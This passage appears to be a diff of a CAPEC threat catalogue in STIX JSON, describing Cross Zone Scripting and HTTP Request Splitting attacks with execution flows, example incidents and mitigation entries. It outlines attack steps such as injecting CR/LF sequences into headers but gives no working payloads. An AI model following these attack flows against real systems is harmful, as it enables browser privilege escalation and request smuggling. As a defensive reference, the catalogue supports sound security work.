This is a privilege elevation attack targeted at zone-based web-browser security.", + "external_references": [ + { + "external_id": "CAPEC-104", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/104.html" + }, + { + "external_id": "CWE-250", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/250.html" + }, + { + "external_id": "CWE-638", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/638.html" + }, + { + "external_id": "CWE-285", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/285.html" + }, + { + "external_id": "CWE-116", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/116.html" + }, + { + "external_id": "CWE-20", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/20.html" + } + ], + "id": "attack-pattern--ebf5cbfb-36d8-4983-9267-9d17bff3817f", + "modified": "2022-02-22T00:00:00.000Z", + "name": "Cross Zone Scripting", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--c05fff04-b965-4a11-9c18-379dac31969f" + ], + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authorization": [ + "Gain Privileges" + ], + "Availability": [ + "Execute Unauthorized Commands (Run Arbitrary Code)" + ], + "Confidentiality": [ + "Read Data", + "Gain Privileges", + "Execute Unauthorized Commands (Run Arbitrary Code)" + ], + "Integrity": [ + "Modify Data", + "Execute Unauthorized Commands (Run Arbitrary Code)" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "There was a cross zone scripting vulnerability discovered in Skype that allowed one user to upload a video with a maliciously crafted title that contains a script. 
Subsequently, when the victim attempts to use the \"add video to chat\" feature on attacker's video, the script embedded in the title of the video runs with local zone privileges. Skype is using IE web controls to render internal and external HTML pages. \"Add video to chat\" uses these web controls and they are running in the Local Zone. Any user who searched for the video in Skype with the same keywords as in the title field, would have the attackers' code executing in their browser with local zone privileges to their host machine (e.g. applications on the victim's host system could be executed)." + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Find systems susceptible to the attack: Find systems that contain functionality that is accessed from both the internet zone and the local zone. There needs to be a way to supply input to that functionality from the internet zone and that original input needs to be used later on a page from a local zone.

  2. Techniques
    Leverage knowledge of common local zone functionality on targeted platforms to guide attempted injection of code through relevant internet zone mechanisms. In some cases this may be due to standard system configurations enabling shared functionality between internet and local zones. The attacker can search for indicators that these standard configurations are in place.

Experiment

  1. Find the insertion point for the payload: The attacker first needs to find some system functionality or possibly another weakness in the system (e.g. susceptibility to cross site scripting) that would provide the attacker with a mechanism to deliver the payload (i.e. the code to be executed) to the user. The location from which this code is executed in the user's browser needs to be within the local machine zone.

  2. Techniques
    Finding weaknesses in functionality used by both privileged and unprivileged users.

Exploit

  1. Craft and inject the payload: Develop the payload to be executed in the higher privileged zone in the user's browser. Inject the payload and attempt to lure the victim (if possible) into executing the functionality which unleashes the payload.

  2. Techniques
    The attacker makes it as likely as possible that the vulnerable functionality into which they have injected the payload has a high likelihood of being used by the victim.
    Leverage cross-site scripting vulnerability to inject payload.
", + "x_capec_extended_description": "\n In a zone-based model, pages belong to one of a set of zones corresponding to the level of privilege assigned to that page. Pages in an untrusted zone would have a lesser level of access to the system and/or be restricted in the types of executable content it was allowed to invoke. In a cross-zone scripting attack, a page that should be assigned to a less privileged zone is granted the privileges of a more trusted zone. This can be accomplished by exploiting bugs in the browser, exploiting incorrect configuration in the zone controls, through a cross-site scripting attack that causes the attackers' content to be treated as coming from a more trusted page, or by leveraging some piece of system functionality that is accessible from both the trusted and less trusted zone. This attack differs from \"Restful Privilege Escalation\" in that the latter correlates to the inadequate securing of RESTful access methods (such as HTTP DELETE) on the server, while cross-zone scripting attacks the concept of security zones as implemented by a browser.\n ", + "x_capec_likelihood_of_attack": "Medium", + "x_capec_prerequisites": [ + "The target must be using a zone-aware browser." + ], + "x_capec_resources_required": [ + "None: No specialized resources are required to execute this type of attack." 
+ ], + "x_capec_skills_required": { + "Medium": "Ability to craft malicious scripts or find them elsewhere and ability to identify functionality that is running web controls in the local zone and to find an injection vector into that functionality" + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Disable script execution.", + "id": "course-of-action--9d62b228-ecb8-4238-bc64-ef63f9d03bd5", + "modified": "2022-02-22T00:00:00.000Z", + "name": "coa-104-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--d53f8236-31b6-44ef-9829-434ecc01751b", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--9d62b228-ecb8-4238-bc64-ef63f9d03bd5", + "target_ref": "attack-pattern--ebf5cbfb-36d8-4983-9267-9d17bff3817f", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Ensure that sufficient input validation is performed for any potentially untrusted data before it is used in any privileged context or zone", + "id": "course-of-action--ec174eec-0e8f-4c98-bfba-3ea29348c294", + "modified": "2022-02-22T00:00:00.000Z", + "name": "coa-104-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": 
"identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--9a5924dc-2691-401b-b498-a96e19330e3f", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--ec174eec-0e8f-4c98-bfba-3ea29348c294", + "target_ref": "attack-pattern--ebf5cbfb-36d8-4983-9267-9d17bff3817f", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Limit the flow of untrusted data into the privileged areas of the system that run in the higher trust zone", + "id": "course-of-action--ebaa0190-21bc-40aa-835b-534ee9459aba", + "modified": "2022-02-22T00:00:00.000Z", + "name": "coa-104-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--ddbbaa85-70d2-430f-b63f-f76eff819192", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--ebaa0190-21bc-40aa-835b-534ee9459aba", + "target_ref": "attack-pattern--ebf5cbfb-36d8-4983-9267-9d17bff3817f", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Limit the sites that are being added to the local machine zone and restrict the privileges of the code running in that zone to the bare minimum", + "id": "course-of-action--abf207ec-5477-490e-a258-3be7ce5376f4", + "modified": "2022-02-22T00:00:00.000Z", + "name": "coa-104-3", + 
"object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--aa57cebd-a942-48ea-8782-ade74acdbddb", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--abf207ec-5477-490e-a258-3be7ce5376f4", + "target_ref": "attack-pattern--ebf5cbfb-36d8-4983-9267-9d17bff3817f", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Ensure proper HTML output encoding before writing user supplied data to the page", + "id": "course-of-action--d46c76e7-68c6-4e46-a3a2-d7dd40b98d75", + "modified": "2022-02-22T00:00:00.000Z", + "name": "coa-104-4", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--a223d161-4991-4c87-8118-ea0ee66f9f31", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--d46c76e7-68c6-4e46-a3a2-d7dd40b98d75", + "target_ref": "attack-pattern--ebf5cbfb-36d8-4983-9267-9d17bff3817f", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "\n An adversary abuses the flexibility and discrepancies in the parsing and interpretation of HTTP Request 
messages by different intermediary HTTP agents (e.g., load balancer, reverse proxy, web caching proxies, application firewalls, etc.) to split a single HTTP request into multiple unauthorized and malicious HTTP requests to a back-end HTTP agent (e.g., web server).\n See CanPrecede relationships for possible consequences.\n ", + "external_references": [ + { + "external_id": "CAPEC-105", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/105.html" + }, + { + "external_id": "CWE-74", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/74.html" + }, + { + "external_id": "CWE-113", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/113.html" + }, + { + "external_id": "CWE-138", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/138.html" + }, + { + "external_id": "CWE-436", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/436.html" + }, + { + "description": "HTTP Request Splitting", + "external_id": "24", + "source_name": "WASC", + "url": "http://projects.webappsec.org/HTTP-Request-Splitting" + }, + { + "description": "HTTP Response Smuggling, Beyond Security", + "external_id": "REF-117", + "source_name": "reference_from_CAPEC", + "url": "http://www.securiteam.com/securityreviews/5CP0L0AHPC.html" + }, + { + "description": "OWASP Web Security Testing Guide, The Open Web Application Security Project (OWASP)", + "external_id": "REF-617", + "source_name": "reference_from_CAPEC", + "url": "https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/07-Input_Validation_Testing/15-Testing_for_HTTP_Splitting_Smuggling.html" + }, + { + "description": "Robert Auger, HTTP Request Splitting, 2011, The Web Application Security Consortium", + "external_id": "REF-679", + "source_name": "reference_from_CAPEC", + "url": "http://projects.webappsec.org/w/page/13246929/HTTP%20Request%20Splitting" + } + ], + "id": 
"attack-pattern--b89511b6-f0fb-4c1d-a884-a0d5a0d82b4e", + "modified": "2022-09-29T00:00:00.000Z", + "name": "HTTP Request Splitting", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_can_precede_refs": [ + "attack-pattern--8f665166-dfd1-40cb-91e8-b78bee1ceb6a", + "attack-pattern--e244a53a-8c69-462c-8ff2-900a839d48cb", + "attack-pattern--70b83583-ffe3-4e6d-b4a6-61a9b9efc346", + "attack-pattern--63f43efb-7a34-4302-b3dc-8245100fdea9", + "attack-pattern--bd4f8f46-1bc7-40a9-b15a-e36b7671cf5b", + "attack-pattern--ce92f5b9-6228-4354-8a1b-72ad7ad3bb84" + ], + "x_capec_child_of_refs": [ + "attack-pattern--9c983530-1927-43ca-addd-63d149cda4a7" + ], + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authorization": [ + "Gain Privileges" + ], + "Availability": [ + "Execute Unauthorized Commands" + ], + "Confidentiality": [ + "Execute Unauthorized Commands", + "Gain Privileges", + "Read Data" + ], + "Integrity": [ + "Execute Unauthorized Commands", + "Modify Data" + ] + }, + "x_capec_domains": [ + "Communications", + "Software" + ], + "x_capec_example_instances": [ + "\n Microsoft Internet Explorer versions 5.01 SP4 and prior, 6.0 SP2 and prior, and 7.0 contain a vulnerability that could allow an unauthenticated, remote adversary to conduct HTTP request splitting and smuggling attacks. The vulnerability is due to an input validation error in the browser that allows adversaries to manipulate certain headers to expose the browser to HTTP request splitting and smuggling attacks. Attacks may include cross-site scripting, proxy cache poisoning, and session fixation. In certain instances, an exploit could allow the adversary to bypass web application firewalls or other filtering devices. Microsoft has confirmed the vulnerability and released software updates.\n " + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Survey network to identify target: The adversary performs network reconnaissance by monitoring relevant traffic to identify the network path and parsing of the HTTP messages with the goal of identifying potential targets.

  2. Techniques
    Scan networks to fingerprint HTTP infrastructure and monitor HTTP traffic to identify HTTP network path with a tool such as a Network Protocol Analyzer.

Experiment

  1. Identify vulnerabilities in targeted HTTP infrastructure and technologies: The adversary sends a variety of benign/ambiguous HTTP requests to observe responses from HTTP infrastructure in order to identify differences/discrepancies in the interpretation and parsing of HTTP requests by examining supported HTTP protocol versions, HTTP headers, syntax checking and input filtering.

  2. Cause differential HTTP responses by experimenting with identified HTTP Request vulnerabilities: The adversary sends maliciously crafted HTTP requests with custom strings and embedded web scripts and objects in HTTP headers to interfere with the parsing of intermediary and back-end HTTP infrastructure, followed by normal/benign HTTP request from the adversary or a random user. The intended consequences of the malicious HTTP requests will be observed in the HTTP infrastructure response to the normal/benign HTTP request to confirm applicability of identified vulnerabilities in the adversary's plan of attack.

  3. Techniques
    Continue the monitoring of HTTP traffic.
    \n Utilize different sequences of special characters (CR - Carriage Return, LF - Line Feed, HT - Horizontal Tab, SP - Space and etc.) to bypass filtering and back-end encoding and to embed:\n \n additional HTTP Requests with their own headers\n malicious web scripts into parameters of HTTP Request headers (e.g., browser cookies like Set-Cookie or Ajax web/browser object parameters like XMLHttpRequest)\n adversary chosen encoding (e.g., UTF-7)\n \n to utilize additional special characters (e.g., > and <) filtered by the target HTTP agent.\n Note that certain special characters and character encoding may be applicable only to intermediary and front-end agents with rare configurations or that are not RFC compliant.\n
    Follow an unrecognized (sometimes a RFC compliant) HTTP header with a subsequent HTTP request to potentially cause the HTTP request to be ignored and interpreted as part of the preceding HTTP request.

Exploit

  1. Perform HTTP Request Splitting attack: Using knowledge discovered in the experiment section above, smuggle a message to cause one of the consequences.

  2. Techniques
    Leverage techniques identified in the Experiment Phase.
", + "x_capec_extended_description": "\n This entails the adversary injecting malicious user input into various standard and/or user defined HTTP headers within a HTTP Request through user input of Carriage Return (CR), Line Feed (LF), Horizontal Tab (HT), Space (SP) characters as well as other valid/RFC compliant special characters and unique character encoding. This malicious user input allows for web script to be injected in HTTP headers as well as into browser cookies or Ajax web/browser object parameters like XMLHttpRequest during implementation of asynchronous requests.\n This attack is usually the result of the usage of outdated or incompatible HTTP protocol versions as well as lack of syntax checking and filtering of user input in the HTTP agents receiving HTTP messages in the path.\n This differs from CAPEC-34 HTTP Response Splitting, which is usually an attempt to compromise a client agent (e.g., web browser) by sending malicious content in HTTP responses from back-end HTTP infrastructure. HTTP Request Splitting is an attempt to compromise aback-end HTTP agentvia HTTP Request messages.\n HTTP Smuggling (CAPEC-33 and CAPEC-273) is different from HTTP Splitting due to the fact it relies upon discrepancies in the interpretation of various HTTP Headers and message sizes and not solely user input of special characters and character encoding. 
HTTP Smuggling was established to circumvent mitigations against HTTP Request Splitting techniques.\n ", + "x_capec_likelihood_of_attack": "Medium", + "x_capec_peer_of_refs": [ + "attack-pattern--ba694895-a0cf-494e-ace2-bf3488330b80" + ], + "x_capec_prerequisites": [ + "An additional intermediary HTTP agent such as an application firewall or a web caching proxy between the adversary and the second agent such as a web server, that sends multiple HTTP messages over same network connection.", + "Differences in the way the two HTTP agents parse and interpret HTTP requests and its headers.", + "HTTP headers capable of being user-manipulated.", + "HTTP agents running on HTTP/1.0 or HTTP/1.1 that allow for Keep Alive mode, Pipelined queries, and Chunked queries and responses." + ], + "x_capec_resources_required": [ + "Tools capable of crafting malicious HTTP messages and monitoring HTTP messages responses." + ], + "x_capec_skills_required": { + "Medium": "Possess knowledge on the exact details in the discrepancies between several targeted HTTP agents in path of an HTTP message in parsing its message structure and individual headers." 
+ }, + "x_capec_status": "Stable", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Design: evaluate HTTP agents prior to deployment for parsing/interpretation discrepancies.", + "id": "course-of-action--94b24ec6-eaed-40ba-aa65-789101ea9a55", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-105-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--4c7aff6e-7858-4273-ba44-dc920b8ff560", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--94b24ec6-eaed-40ba-aa65-789101ea9a55", + "target_ref": "attack-pattern--b89511b6-f0fb-4c1d-a884-a0d5a0d82b4e", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Configuration: front-end HTTP agents notice ambiguous requests.", + "id": "course-of-action--64555d1a-a57e-49d9-b9f8-02c843ba1af5", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-105-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--8d3cd512-2e70-4e56-a57c-507684d1f6d1", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": 
"mitigates", + "source_ref": "course-of-action--64555d1a-a57e-49d9-b9f8-02c843ba1af5", + "target_ref": "attack-pattern--b89511b6-f0fb-4c1d-a884-a0d5a0d82b4e", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Configuration: back-end HTTP agents reject ambiguous requests and close the network connection.", + "id": "course-of-action--0bc589af-7ac3-4771-b1db-defb88ba61b5", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-105-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--b867b8e9-a2c3-4882-98c9-3d5fa142fddb", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--0bc589af-7ac3-4771-b1db-defb88ba61b5", + "target_ref": "attack-pattern--b89511b6-f0fb-4c1d-a884-a0d5a0d82b4e", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Configuration: Disable reuse of back-end connections.", + "id": "course-of-action--65a59d08-b52c-4c78-b802-6e65c65f02e5", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-105-3", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--8a78056e-5c0e-44f8-800a-91b0b7178716", + "modified": "2022-09-29T00:00:00.000Z", + 
"object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--65a59d08-b52c-4c78-b802-6e65c65f02e5", + "target_ref": "attack-pattern--b89511b6-f0fb-4c1d-a884-a0d5a0d82b4e", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Configuration: Use HTTP/2 for back-end connections.", + "id": "course-of-action--948de9b9-7ad6-4bf5-8daf-f2208db360d6", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-105-4", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--ffba3f90-bbb1-4ab0-bf6a-750ca56acabd", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--948de9b9-7ad6-4bf5-8daf-f2208db360d6", + "target_ref": "attack-pattern--b89511b6-f0fb-4c1d-a884-a0d5a0d82b4e", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Configuration: Use the same web server software for front-end and back-end server.", + "id": "course-of-action--4bd16590-2382-4a10-9712-f28b7bf84fec", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-105-5", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": 
"relationship--c718be44-09e6-4be5-9a91-f792b8219ef4", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--4bd16590-2382-4a10-9712-f28b7bf84fec", + "target_ref": "attack-pattern--b89511b6-f0fb-4c1d-a884-a0d5a0d82b4e", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Implementation: Utilize a Web Application Firewall (WAF) that has built-in mitigation to detect abnormal requests/responses.", + "id": "course-of-action--5cc83b32-2b3e-41e5-94e8-2e2ea48bf660", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-105-6", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--260f7f64-cbe9-46c3-b7b8-2528b37847d6", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--5cc83b32-2b3e-41e5-94e8-2e2ea48bf660", + "target_ref": "attack-pattern--b89511b6-f0fb-4c1d-a884-a0d5a0d82b4e", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Configuration: Install latest vendor security patches available for both intermediary and back-end HTTP infrastructure (i.e. 
proxies and web servers)", + "id": "course-of-action--43085d5c-cd1e-4175-9d44-f28f8f3cc5f9", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-105-7", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--558063de-9f07-40ca-a209-3935e9afaddd", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--43085d5c-cd1e-4175-9d44-f28f8f3cc5f9", + "target_ref": "attack-pattern--b89511b6-f0fb-4c1d-a884-a0d5a0d82b4e", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Configuration: Ensure that HTTP infrastructure in the chain or network path utilize a strict uniform parsing process.", + "id": "course-of-action--50ea55ae-d8a8-4279-9dc9-05b6fb416b84", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-105-8", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--1d29447c-15a4-4126-bef5-8a3dec2bc73a", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--50ea55ae-d8a8-4279-9dc9-05b6fb416b84", + "target_ref": "attack-pattern--b89511b6-f0fb-4c1d-a884-a0d5a0d82b4e", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": 
"2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Implementation: Utilize intermediary HTTP infrastructure capable of filtering and/or sanitizing user-input.", + "id": "course-of-action--a2e15722-f07d-44db-b988-af501e0f1e13", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-105-9", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--4c046dff-3500-4208-a8f7-e7d170ad1267", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--a2e15722-f07d-44db-b988-af501e0f1e13", + "target_ref": "attack-pattern--b89511b6-f0fb-4c1d-a884-a0d5a0d82b4e", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "This attack pattern has been deprecated as it referes to an existing chain relationship between \"CAPEC-93 : Log Injection-Tampering-Forging\" and \"CAPEC-63 : Cross-Site Scripting\". 
